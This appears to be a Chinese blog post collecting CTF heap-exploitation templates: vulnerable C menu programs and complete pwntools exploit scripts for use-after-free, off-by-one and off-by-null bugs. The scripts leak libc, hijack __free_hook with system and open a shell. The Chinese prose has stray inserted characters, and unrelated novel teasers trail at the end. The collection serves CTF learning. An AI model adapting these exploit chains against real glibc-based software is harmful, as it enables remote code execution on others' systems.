pwn題常見(jiàn)堆利用總結(jié)

這里記錄一些ctf中堆pwn的板子瘦穆，總結(jié)學(xué)習(xí)

UAF打掉tcache拿libc

//uaf
#include<stdio.h>
#include<stdlib.h>
char *heap[0x20];
int num=0;
void create()
{
    if(num>=0x20)
    {
        puts("no more");
        return;
    }
    int size;
    puts("how big");
    scanf("%d",&size);
    if(size>=0x20)
    {
        puts("no more");
        return;
    }
    heap[num]=(char *)malloc(size);
    num++;
}
void show(){
    int i;
  int idx;
  char buf[4];
  puts("idx");
    (read(0, buf, 4));
    idx = atoi(buf);
  if (!heap[idx]) {
    puts("no hvae things\n");
  } else {
    printf("Content:");
    printf("%s",heap[idx]);
  }
}
void dele()
{
    int i;
  int idx;
  char buf[4];
  puts("idx");
    (read(0, buf, 4));
    idx = atoi(buf);
  if (!heap[idx]) {
    puts("no hvae things\n");
  } else {
      free(heap[idx]);
      num--;
  }
}
void edit()
{
    int size;
    int i;
  int idx;
  char buf[4];
  puts("idx");
    (read(0, buf, 4));
    idx = atoi(buf);
  if (!heap[idx]) {
    puts("no hvae things\n");
  } else {
      puts("how big u read");
      scanf("%d",&size);
      if(size>0x20)
      {
          puts("too more");
          return;
      }
      puts("Content:");
      read(0,heap[idx],size);
  }
}
void menu(void){
    puts("1.create");
    puts("2.dele");
    puts("3.edit");
    puts("4.show");
}
void main()
{
    int choice;
    while(1)
    {
        menu();
        scanf("%d",&choice);
        switch(choice)
        {
            case 1:create();break;
            case 2:dele();break;
            case 3:edit();break;
            case 4:show();break;
            default:puts("error");
        }
    }
}

EXP

from pwn import *
r=process('./uaf')
elf = ELF("uaf")
libc=elf.libc
# context.log_level='debug'
def add(size):
    r.sendlineafter("4.show\n",'1')
    r.sendlineafter("how big\n",str(size))

def dele(idx):
    r.sendlineafter("4.show\n",'2')
    r.sendlineafter("idx\n",str(idx))

def edit(idx,size,con):
    r.sendlineafter("4.show\n",'3')
    r.sendlineafter("idx\n",str(idx))
    r.sendlineafter("how big u read\n",str(size))
    r.sendafter("Content:\n",con)
def show(idx):
    r.sendlineafter("4.show\n",'4')
    r.sendlineafter("idx\n",str(idx))

def dbg():
    gdb.attach(r)
    pause()
for i in range(7):
    add(0x10)
# 拿堆地址
dele(0)
dele(1)
show(1)
r.recvuntil("Content:")
heap=u64(r.recv(6)+'\x00'*2)-0x001680+0x10
print(hex(heap))
# 申請(qǐng)到tcache管理空間溢吻，同時(shí)恢復(fù)tcache結(jié)構(gòu)體功能，保持0x20堆塊正常運(yùn)行
edit(0,0x10,p64(heap))
add(0x10)
add(0x10)
add(0x10)
add(0x10)
add(0x10)
edit(7,0x20,p64(0)*4) # 7即tcache結(jié)構(gòu)體
# 利用uaf申請(qǐng)到tcache結(jié)構(gòu)題內(nèi)管理0x250堆塊的部分
dele(5)# 5-1
edit(5,0x10,p64(heap+0x20))
add(0x10)
add(0x10)
edit(10,0x20,p64(0x0000000007000000))
dele(7)
# 打到unsortbin后切割獲取libc
add(0x10)
show(10)
r.recvuntil("Content:")
base=u64(r.recv(6)+'\x00'*2)-0x3ebee0
print(hex(base))
free=base+libc.sym['__free_hook']
sys=base+libc.sym['system']
# 恢復(fù)一下結(jié)構(gòu)體，進(jìn)行最后的uaf利用
edit(10,0x20,p64(0)*4)
dele(10)
edit(10,0x20,p64(free))
add(0x10)
add(0x10)
edit(11,0x10,p64(sys))
edit(10,0x10,"/bin/sh\x00")
dele(10)
r.interactive()

小溢出堆疊(offbyone/向下合并/萬(wàn)用合并)

#include<stdio.h>
#include <math.h>
#include <stdio.h>
#include<unistd.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
void sandbox(){
    struct sock_filter filter[] = {
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
    BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
    };
    prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
    prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}
int init()
{
    setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  return setvbuf(stderr, 0LL, 2, 0LL);
}
int num=0;
char *heaparray[0x10];
size_t realsize[0x10];
void create(){
    if(num>=0x20)
    {
        puts("no more");
        return;
    }
    int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
    heaparray[num]=(char *)malloc(size);
    realsize[num]=size;
    num++;

    }
void show(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);//輸入堆塊的index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){//根據(jù)序列進(jìn)行查找
        //打印指定堆塊內(nèi)容
        printf("Size : %ld\nContent : %s\n",realsize[idx],heaparray[idx]);
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
void edit(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);//輸入堆的序列號(hào)
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){//判斷序列號(hào)的正確性
        puts("Out of bound!");
        _exit(0);
    }
  //若序列號(hào)正確
    if(heaparray[idx]){
        int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
        printf("Content of heap : \n");
        read(0,heaparray[idx],size);
    //調(diào)用read_input函數(shù)輸入堆的內(nèi)容
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
void dele(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);//輸入index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){//判斷堆塊序列的合法性
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){
        free(heaparray[idx]);//free heaparray[idx]指針
        realsize[idx] = 0 ;
        heaparray[idx]=NULL;
        puts("Done !"); 
        num--;
    }else{
        puts("No such heap !");
    }
}
void menu(void){
    puts("1.create");
    puts("2.dele");
    puts("3.edit");
    puts("4.show");
}
void main()
{
    init();
    sandbox();
    int choice;
    while(1)
    {
        menu();
        scanf("%d",&choice);
        switch(choice)
        {
            case 1:create();break;
            case 2:dele();break;
            case 3:edit();break;
            case 4:show();break;
            default:puts("error");
        }
    }
}

EXP

from pwn import *
r=process('./zheap')
elf = ELF('zheap')
libc=elf.libc
context.log_level='debug'
def add(size):
    r.sendlineafter("4.show\n",'1')
    r.sendlineafter("Size of Heap : \n",str(size))

def dele(idx):
    r.sendlineafter("4.show\n",'2')
    r.sendlineafter("Index :\n",str(idx))

def edit(idx,con):
    r.sendlineafter("4.show\n",'3')
    r.sendlineafter("Index :\n",str(idx))
    r.sendafter("Content of heap : \n",con)
def show(idx):
    r.sendlineafter("4.show\n",'4')
    r.sendlineafter("Index :\n",str(idx))
def dbg():
    gdb.attach(r)
    pause()
# 9個(gè)0x80堆=0x480融柬，填0x21自主合并
add(0x18)#0
add(0x78)#1
for i in range(10):
    add(0x78)
for i in range(2,10):
    edit(i,p64(0x21)*14)
edit(0,'a'*0x18+p64(0x421))
dele(1)
# 泄露完libc去找堆復(fù)用
add(0x18)
show(1)
r.recvuntil("Content : ")
leak=u64(r.recv(6)+'\x00'*2)
print(hex(leak))
base=leak-0x3ec090
sys=libc.sym['system']+base
free=libc.sym['__free_hook']+base
# 用vmmap看heap結(jié)構(gòu)體存在堆復(fù)用
dele(1)
edit(11,p64(free))
add(0x18)
add(0x18)
edit(11,"/bin/sh")
edit(12,p64(sys))
dele(11)
r.interactive()

offbyone向下合并構(gòu)造堆復(fù)用(malloc_consolidate拿libc)

題目漏洞就是edit的offbyone辆雾，數(shù)據(jù)輸入用的scanf輸入

from pwn import *
context.log_level = 'debug'
context.arch='amd64'
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
  '''
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

p = process("bitflip")
elf = ELF('bitflip')
libc = elf.libc

def cmd(choice):
    sla('Your choice: ',choice)
def add(idx,size):
    cmd(1)
    sla('Index: ',idx)
    sla('Size: ',size)

def edit(idx,content):
    cmd(2)
    sla('Index: ',idx)
    p.sendlineafter(': ',content)

def show(idx):
    cmd(3)
    sla('Index: ',idx)

def delete(idx):
    cmd(4)
    sla('Index: ',idx)
def dbg():
    gdb.attach(p)
    pause()

for i in range(9):
    add(i,0x48)
for i in range(8):
    delete(i)

p.sendlineafter('Your choice: ','99999999'*0xf0)
for i in range(7):
    add(i,0x48)

add(7,0x48)
show(7)
p.recvuntil('Content: ')
libc_base = u64(p.recv(6)+'\x00'*2)-160-0x3EBC40
lg('libc_base',libc_base)
sys=libc.sym['system']+libc_base
free=libc.sym['__free_hook']+libc_base
for i in range(9,16):
    add(i,0x18)
for i in range(16,23):
    add(i,0x28)

add(23,0x18)
add(24,0x28)
add(25,0x18)
add(26,0x18)

for i in range(9,23):
    delete(i)
delete(25)
edit(23,'a'*0x18+'\x51')
delete(24)
add(27,0x48)
edit(27,p64(0x21)*6+p64(free-0x10))
for i in range(9,16):
    add(i,0x18)
add(24,0x18)
edit(24,'/bin/sh\x00')
add(25,0x18)
edit(25,p64(sys))
delete(24)

p.interactive()

大堆合并（offbynull/向前合并）

題目就是offbynull漏洞，一般可申請(qǐng)的堆都在0x100作業(yè)

EXP

from pwn import *
context.log_level = 'debug'
context.arch='amd64'

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

p = process("old_school_revenge")
elf = ELF('old_school_revenge')
libc = elf.libc

def cmd(choice):
    sla('Your choice: ',choice)
def add(idx,size):
    cmd(1)
    sla('Index: ',idx)
    sla('Size: ',size)

def edit(idx,content):
    cmd(2)
    sla('Index: ',idx)
    p.sendlineafter(': ',content)

def show(idx):
    cmd(3)
    sla('Index: ',idx)

def delete(idx):
    cmd(4)
    sla('Index: ',idx)
def dbg():
    gdb.attach(p)
    pause()

for i in range(9):
    add(i,0x48)
for i in range(8):
    delete(i)

p.sendlineafter('Your choice: ','99999999'*0xf0)
for i in range(7):
    add(i,0x48)

add(7,0x48)
show(7)
p.recvuntil('Content: ')
libc_base = u64(p.recv(6)+'\x00'*2)-160-0x3EBC40
lg('libc_base',libc_base)
free=libc_base+libc.sym['__free_hook']
sys=libc_base+libc.sym['system']
# 前面是看到scanf輸入直接抄板子梭哈了窒悔，獲取到libc
for i in range(10,17):
    add(i,0xf8)
add(17,0xf8)
add(18,0x88)# edit中間這個(gè)chunk
add(19,0xf8)
add(20,0x88)
for i in range(10,17):
    delete(i)

delete(17)
edit(18,'a'*0x80+p64(0x190))
delete(19)
for i in range(10,17):
    add(i,0xf8)
add(21,0xf8)
add(22,0x88)
delete(18)
edit(22,p64(free))
add(23,0x88)
edit(23,'/bin/sh\x00')
add(24,0x88)
edit(24,p64(sys))
delete(23)
p.interactive()

大堆合并（offbynull在libc2.31/2.29下的利用）

題目限制堆數(shù)量10個(gè)呜袁，for循環(huán)編號(hào)賦予
基本上無(wú)size限制，僅有offbynull漏洞简珠，libc-2.31

思路

偽造出一個(gè)chunk阶界，使其能夠繞過(guò)這兩個(gè)檢測(cè)。
一個(gè)是向低地值合并的檢測(cè)：

if (__glibc_unlikely (chunksize(p) != prevsize))
    malloc_printerr ("corrupted size vs. prev_size while consolidating");

另一個(gè)就是unlink時(shí)候的檢測(cè)

if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
    malloc_printerr (check_action, "corrupted double-linked list", P, AV);

image.png

EXP

from pwn import *
context.log_level = 'debug'

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

p = process("bornote")
elf = ELF('bornote')
libc = elf.libc

def cmd(choice):
    sla("aaa's cmd: ",choice)

def add(size):
    cmd(1)
    sla('Size: ',size)

def edit(idx,content):
    cmd(3)
    sla('Index: ',idx)
    p.sendlineafter('Note: ',content)

def show(idx):
    cmd(4)
    sla('Index: ',idx)

def delete(idx):
    cmd(2)
    sla('Index: ',idx)

def dbg():
    gdb.attach(p)
    pause()
fakechunk = 0x00005561306c6f00
sla('username: ','aaa')
# 這里size最大最好別超過(guò)0x440，不然放進(jìn)largebin時(shí)/不在同一個(gè)區(qū)間上
add(0x418) # 0 
add(0x128) # 1 # 最后繞過(guò)tcache個(gè)數(shù)檢測(cè)膘融，和最后利用堆復(fù)用的chunk一樣大
add(0x418) # 2
add(0x438) # 3 
add(0x148) # 4
add(0x428) # 5 
add(0x138) # 6

# fakechunk 粘fd和bk
delete(0)
delete(3)
delete(5)

#設(shè)置fakechunk size位
delete(2) 
add(0x438)  # 0 
edit(0,'a' * 0x418 + p64(0xb01)[:7])
add(0x418)  # 2 
add(0x428)  # 3 
add(0x418)  # 5 

# 設(shè)置bk
delete(5)
delete(2)
add(0x418)  # 2 
edit(2,p64(0))
add(0x418)  # 5 

# 設(shè)置fd
delete(5)
delete(3)
add(0x5f8)# 3 # 置入largebin
add(0x428)# 5
edit(5,'')
add(0x418)# 7
add(0xf8)# 8

# 設(shè)置prevsize
edit(6,'a'*0x130+p64(0xb00))
delete(3)

add(0x10)# 3
show(7)
p.recvuntil("Note: ")
libc_base = u64(p.recv(6).ljust(8,'\x00'))- 0x1EBBE0
lg('libc_base',libc_base)
sys = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]
add(0x128)#9
delete(1)
delete(9)
edit(7,p64(free_hook))
add(0x128)# 1
add(0x128)# 9
edit(1,"/bin/sh\x00")
edit(9,p64(sys))
delete(1)

p.interactive()

爆破

思路

漏洞是UAF芙粱，但每次申請(qǐng)的size大小不可控，導(dǎo)致無(wú)法準(zhǔn)確申請(qǐng)到想要的堆
盡量避免doublefree的申請(qǐng)氧映，降低爆破次數(shù)

EXP

#coding=utf-8
from pwn import *
# context.log_level = 'debug'

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)
# p = process("random_heap")
elf = ELF('random_heap')
libc = elf.libc
def cmd(choice):
    sla("Your choice: ",choice)
def add(idx,size):
    cmd(1)
    sla("Index: ",idx)
    sla("Size: ",size)
def edit(idx,content):
    cmd(2)
    sla("Index: ",idx)
    p.sendafter("Content: ",content)
def show(idx):
    cmd(3)
    sla("Index: ",idx)
def delete(idx):
    cmd(4)
    sla("Index: ",idx)
def dbg():
    gdb.attach(p)
    pause()

def pwn():
    add(0,0xf8)
    add(1,0x88)
    edit(1,'/bin/sh\x00')
    # 拿堆地址
    delete(0)
    edit(0,'a'*0x10)
    delete(0)
    show(0)
    p.recvuntil("Content: ")
    heap=u64(p.recv(6)+'\x00'*2)-0x260
    lg('heap',heap)
    for i in range(6):
        edit(0,'a'*0x10)
        delete(0)
    show(0)
    p.recvuntil("Content: ")
    libc_base=u64(p.recv(6)+'\x00'*2)-96-0x3ebc40
    lg('libc_base',libc_base)
    free_hook = libc_base + libc.sym['__free_hook']
    system = libc_base + libc.sym['system']
    add(2,0x18)
    delete(2)
    edit(0,p64(free_hook)*2)
    delete(2)
    edit(0,p64(free_hook)*2)
    add(2,0x18)
    show(2)
    tmp = u64(((p.recvuntil("\x7f",timeout=0.4))[-6::]).ljust(8,'\x00'))
    if(tmp!=free_hook):
        exit()
    add(3,0x18)
    edit(3,p64(system))
    delete(1)
    p.sendline("cat flag")
    print p.recvuntil("}",timeout=0.4)

times = 0
while 1:
    try:
        p = process("./random_heap")
        pwn()
        p.interactive()
    except:
        times += 1
        print("="*8+str(times)+" times"+"="*8)
        p.close()

最后編輯于：2022.03.21 17:47:18

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末春畔，一起剝皮案震驚了整個(gè)濱河市，隨后出現(xiàn)的幾起案子屯耸，更是在濱河造成了極大的恐慌拐迁，老刑警劉巖，帶你破解...
沈念sama閱讀 218,451評(píng)論 6贊 506
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件疗绣，死亡現(xiàn)場(chǎng)離奇詭異线召，居然都是意外死亡，警方通過(guò)查閱死者的電腦和手機(jī)多矮，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 93,172評(píng)論 3贊 394
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門缓淹，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)，“玉大人塔逃，你說(shuō)我怎么就攤上這事讯壶。” “怎么了湾盗？”我有些...
開(kāi)封第一講書人閱讀 164,782評(píng)論 0贊 354
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵伏蚊，是天一觀的道長(zhǎng)。經(jīng)常有香客問(wèn)我格粪，道長(zhǎng)躏吊，這世上最難降的妖魔是什么？我笑而不...
開(kāi)封第一講書人閱讀 58,709評(píng)論 1贊 294
?港島之戀（遺憾婚禮）
正文為了忘掉前任帐萎，我火速辦了婚禮比伏，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘疆导。我一直安慰自己赁项，他們只是感情好，可當(dāng)我...
茶點(diǎn)故事閱讀 67,733評(píng)論 6贊 392
惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的
文/花漫我一把揭開(kāi)白布澈段。她就那樣靜靜地躺著悠菜，像睡著了一般。火紅的嫁衣襯著肌膚如雪败富。梳的紋絲不亂的頭發(fā)上悔醋，一...
開(kāi)封第一講書人閱讀 51,578評(píng)論 1贊 305
城市分裂傳說(shuō)
那天，我揣著相機(jī)與錄音囤耳，去河邊找鬼。笑死，一個(gè)胖子當(dāng)著我的面吹牛充择，可吹牛的內(nèi)容都是我干的德玫。我是一名探鬼主播，決...
沈念sama閱讀 40,320評(píng)論 3贊 418
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開(kāi)眼椎麦，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼宰僧！你這毒婦竟也來(lái)了？” 一聲冷哼從身側(cè)響起观挎，我...
開(kāi)封第一講書人閱讀 39,241評(píng)論 0贊 276
萬(wàn)榮殺人案實(shí)錄
序言：老撾萬(wàn)榮一對(duì)情侶失蹤琴儿，失蹤者是張志新（化名）和其女友劉穎，沒(méi)想到半個(gè)月后嘁捷，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體造成，經(jīng)...
沈念sama閱讀 45,686評(píng)論 1贊 314
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 37,878評(píng)論 3贊 336
?白月光啟示錄
正文我和宋清朗相戀三年雄嚣，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了晒屎。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
茶點(diǎn)故事閱讀 39,992評(píng)論 1贊 348
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡缓升，死狀恐怖鼓鲁，靈堂內(nèi)的尸體忽然破棺而出，到底是詐尸還是另有隱情港谊，我是刑警寧澤骇吭，帶...
沈念sama閱讀 35,715評(píng)論 5贊 346
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布，位于F島的核電站歧寺，受9級(jí)特大地震影響燥狰，放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜成福，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 41,336評(píng)論 3贊 330
男人毒藥：我在死后第九天來(lái)索命
文/蒙蒙一碾局、第九天我趴在偏房一處隱蔽的房頂上張望。院中可真熱鬧奴艾，春花似錦净当、人聲如沸。這莊子的主人今日做“春日...
開(kāi)封第一講書人閱讀 31,912評(píng)論 0贊 22
一樁弒父案像啼，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽(yáng)。三九已至潭苞，卻和暖如春忽冻，著一層夾襖步出監(jiān)牢的瞬間，已是汗流浹背此疹。一陣腳步聲響...
開(kāi)封第一講書人閱讀 33,040評(píng)論 1贊 270
情欲美人皮
我被黑心中介騙來(lái)泰國(guó)打工僧诚，沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留遮婶，地道東北人。一個(gè)月前我還...
沈念sama閱讀 48,173評(píng)論 3贊 370
代替公主和親
正文我出身青樓湖笨，卻偏偏與公主長(zhǎng)得像旗扑，于是被迫代替她去往敵國(guó)和親。傳聞我的和親對(duì)象是個(gè)殘疾皇子慈省，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 44,947評(píng)論 2贊 355